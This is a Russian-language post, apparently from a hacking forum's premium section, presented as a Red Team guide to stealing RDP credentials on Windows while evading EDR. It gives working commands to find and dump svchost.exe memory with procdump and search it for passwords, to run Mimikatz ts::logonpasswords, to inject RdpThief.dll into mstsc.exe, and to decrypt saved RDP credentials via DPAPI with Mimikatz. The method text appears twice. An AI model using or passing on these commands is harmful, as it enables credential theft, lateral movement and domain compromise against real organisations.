devqp
Премиум
Протокол RDP широко используется для удаленного управления Windows-системами, но часто недостаточно защищен. Для Red Team операций извлечение учетных данных из процессов, связанных с RDP, может привести к горизонтальному перемещению или полной компрометации домена. Альтернативные методы обхода контроля EDR включают анализ процессов svchost.exe и mstsc.exe вместо lsass.
Метод 1: Извлечение из svchost.exe
При RDP-аутентификации учетные данные хранятся в памяти svchost в открытом виде. Для идентификации нужного процесса:
После определения PID выполните дамп памяти:
Анализ оффлайн:
Или через Mimikatz:
Метод 2: Перехват через mstsc.exe
Инструменты RdpThief и SharpRDPThief перехватывают API-вызовы (CredIsMarshaledCredentialW, CryptProtectMemory). Внедрение DLL:
Учетные данные сохраняются в C:\temp\creds.txt с IP-адресом цели. SharpRDPThief использует IPC-сервер для устойчивости.
Метод 3: Расшифровка сохраненных подключений
Сохраненные RDP-учетные данные хранятся в:
Используйте Mimikatz для дешифровки:
Ключ GuidMasterKey из вывода sekurlsa::dpapi обязателен для дешифровки. Результат содержит логин/пароль в открытом виде.
Метод 1: Извлечение из svchost.exe
При RDP-аутентификации учетные данные хранятся в памяти svchost в открытом виде. Для идентификации нужного процесса:
Код:
sc queryex termservice
tasklist /M:rdpcorets.dll
netstat -nob | Select-String TermService -Context 1
Код:
procdump64.exe -ma PID -accepteula C:\target_dir
Код:
strings -el dumpfile | grep 'Password' -C3
Код:
privilege::debug
ts::logonpasswords
Метод 2: Перехват через mstsc.exe
Инструменты RdpThief и SharpRDPThief перехватывают API-вызовы (CredIsMarshaledCredentialW, CryptProtectMemory). Внедрение DLL:
Код:
SimpleInjector.exe mstsc.exe RdpThief.dll
Метод 3: Расшифровка сохраненных подключений
Сохраненные RDP-учетные данные хранятся в:
Код:
C:\Users\username\AppData\Local\Microsoft\Credentials\
Код:
dpapi::cred /in:C:\path\to\cred_file
sekurlsa::dpapi
dpapi::cred /in:C:\path\to\cred_file /masterkey:KEY
vault::list